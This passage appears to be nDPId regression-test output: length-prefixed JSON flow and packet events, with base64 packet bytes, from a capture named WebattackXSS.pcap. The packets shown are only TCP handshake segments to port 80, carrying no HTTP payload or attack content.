-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347433753,"flow_last_seen":1499347439734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57144,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":4921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347433753,"flow_last_seen":1499347439734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347556766,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57144,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4927,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347557789,"flow_last_seen":1499347557789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347557789,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58468,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4927,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":348,"flow_packet_id":1,"flow_last_seen":1499347557789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347557789,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82zBAAD4G6p+sEAABwKgKMuRkAFBn0PMDAAAAAKACchD2DAAAAgQFtAQCCAoBOygzAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4928,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":348,"flow_packet_id":2,"flow_last_seen":1499347557789,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347557789,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5GT+u1l1Z9DzBKAScSChLQAAAgQFtAQCCAoD5PmoATsoMwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4929,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":348,"flow_packet_id":3,"flow_last_seen":1499347557790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347557790,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02zFAAD4G6qasEAABwKgKMuRkAFBn0PME\/rtZdoAQAOVANQAAAQEICgE7KDMD5Pmo"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4936,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":349,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347559043,"flow_last_seen":1499347559043,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347559043,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58482,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4936,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":349,"flow_packet_id":1,"flow_last_seen":1499347559043,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347559043,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8nvhAAD4GJtisEAABwKgKMuRyAFDmPbeUAAAAAKACchCxxwAAAgQFtAQCCAoBOylsAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4937,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":349,"flow_packet_id":2,"flow_last_seen":1499347559043,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347559043,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5HJJe\/AM5j23laAScSB6VwAAAgQFtAQCCAoD5PriATspbAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4938,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":349,"flow_packet_id":3,"flow_last_seen":1499347559044,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347559044,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0nvlAAD4GJt+sEAABwKgKMuRyAFDmPbeVSXvwDYAQAOUZXgAAAQEICgE7KW0D5Pri"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4945,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":350,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347560327,"flow_last_seen":1499347560327,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347560327,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58496,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4945,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":350,"flow_packet_id":1,"flow_last_seen":1499347560327,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347560327,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rRJAAD4GGL6sEAABwKgKMuSAAFBDKIe8AAAAAKACchCDZQAAAgQFtAQCCAoBOyquAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4946,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":350,"flow_packet_id":2,"flow_last_seen":1499347560327,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347560327,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5ICL+5A8QyiHvaAScSBoBAAAAgQFtAQCCAoD5PwjATsqrgEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4947,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":350,"flow_packet_id":3,"flow_last_seen":1499347560328,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347560328,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rRNAAD4GGMWsEAABwKgKMuSAAFBDKIe9i\/uQPYAQAOUHDAAAAQEICgE7Kq4D5Pwj"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4957,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347561622,"flow_last_seen":1499347561622,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347561622,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58510,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4957,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":351,"flow_packet_id":1,"flow_last_seen":1499347561622,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347561622,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8JPRAAD4GoNysEAABwKgKMuSOAFBq0Q8FAAAAAKACchDTIgAAAgQFtAQCCAoBOyvxAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4958,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":351,"flow_packet_id":2,"flow_last_seen":1499347561622,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347561622,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5I6fc34\/atEPBqAScSC1AgAAAgQFtAQCCAoD5P1nATsr8QEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4959,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":351,"flow_packet_id":3,"flow_last_seen":1499347561623,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347561623,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0JPVAAD4GoOOsEAABwKgKMuSOAFBq0Q8Gn3N+QIAQAOVUCgAAAQEICgE7K\/ED5P1n"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4978,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":352,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347564211,"flow_last_seen":1499347564211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347564211,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4978,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":352,"flow_packet_id":1,"flow_last_seen":1499347564211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347564211,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87W5AAD4G2GGsEAABwKgKMuSoAFCF1MMXAAAAAKACchABawAAAgQFtAQCCAoBOy55AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4979,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":352,"flow_packet_id":2,"flow_last_seen":1499347564212,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347564212,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5KgQ0EVbhdTDGKAScSCoSwAAAgQFtAQCCAoD5P\/uATsueQEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4980,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":352,"flow_packet_id":3,"flow_last_seen":1499347564212,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347564212,"pkt":"ABm5CmnxAMGxFOsxCABFAAA07W9AAD4G2GisEAABwKgKMuSoAFCF1MMYENBFXIAQAOVHUwAAAQEICgE7LnkD5P\/u"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4990,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347565457,"flow_last_seen":1499347565457,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347565457,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58550,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4990,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":353,"flow_packet_id":1,"flow_last_seen":1499347565457,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347565457,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8CLtAAD4GvRWsEAABwKgKMuS2AFBcaycLAAAAAKACchDFmwAAAgQFtAQCCAoBOy+wAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4991,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":353,"flow_packet_id":2,"flow_last_seen":1499347565458,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347565458,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5La+IYdMXGsnDKAScSB8AQAAAgQFtAQCCAoD5QEmATsvsAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4992,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":353,"flow_packet_id":3,"flow_last_seen":1499347565458,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347565458,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0CLxAAD4GvRysEAABwKgKMuS2AFBcaycMviGHTYAQAOUbCQAAAQEICgE7L7AD5QEm"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5002,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347566719,"flow_last_seen":1499347566719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566719,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58564,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5002,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":354,"flow_packet_id":1,"flow_last_seen":1499347566719,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347566719,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8bldAAD4GV3msEAABwKgKMuTEAFDBpl67AAAAAKACchAnZgAAAgQFtAQCCAoBOzDsAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5003,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":354,"flow_packet_id":2,"flow_last_seen":1499347566719,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347566719,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5MTiLAwhwaZevKAScSAzsQAAAgQFtAQCCAoD5QJhATsw7AEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5004,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":354,"flow_packet_id":3,"flow_last_seen":1499347566720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347566720,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0blhAAD4GV4CsEAABwKgKMuTEAFDBpl684iwMIoAQAOXSuAAAAQEICgE7MOwD5QJh"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347436274,"flow_last_seen":1499347441734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57170,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347436274,"flow_last_seen":1499347441734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57170,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347437541,"flow_last_seen":1499347442734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57184,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347437541,"flow_last_seen":1499347442734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57184,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347440119,"flow_last_seen":1499347445734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57210,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347440119,"flow_last_seen":1499347445734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347441364,"flow_last_seen":1499347446735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57224,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347441364,"flow_last_seen":1499347446735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57224,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347442626,"flow_last_seen":1499347447735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57238,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5011,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347442626,"flow_last_seen":1499347447735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347566770,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57238,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5020,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347569321,"flow_last_seen":1499347569321,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347569321,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58590,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5020,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":355,"flow_packet_id":1,"flow_last_seen":1499347569321,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347569321,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8g25AAD4GQmKsEAABwKgKMuTeAFCWQ7AYAAAAAKACchD+xwAAAgQFtAQCCAoBOzN2AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5021,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":355,"flow_packet_id":2,"flow_last_seen":1499347569321,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347569321,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5N7q6xnjlkOwGaAScSDyBwAAAgQFtAQCCAoD5QTrATszdgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5022,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":355,"flow_packet_id":3,"flow_last_seen":1499347569321,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347569321,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0g29AAD4GQmmsEAABwKgKMuTeAFCWQ7AZ6usZ5IAQAOWRDwAAAQEICgE7M3YD5QTr"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5032,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347570571,"flow_last_seen":1499347570571,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347570571,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5032,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":356,"flow_packet_id":1,"flow_last_seen":1499347570571,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347570571,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8l0FAAD4GLo+sEAABwKgKMuTsAFD4v6PuAAAAAKACchCnLgAAAgQFtAQCCAoBOzSvAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5033,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":356,"flow_packet_id":2,"flow_last_seen":1499347570571,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347570571,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5Ow6nDyd+L+j76AScSAmywAAAgQFtAQCCAoD5QYkATs0rwEDAwc="} 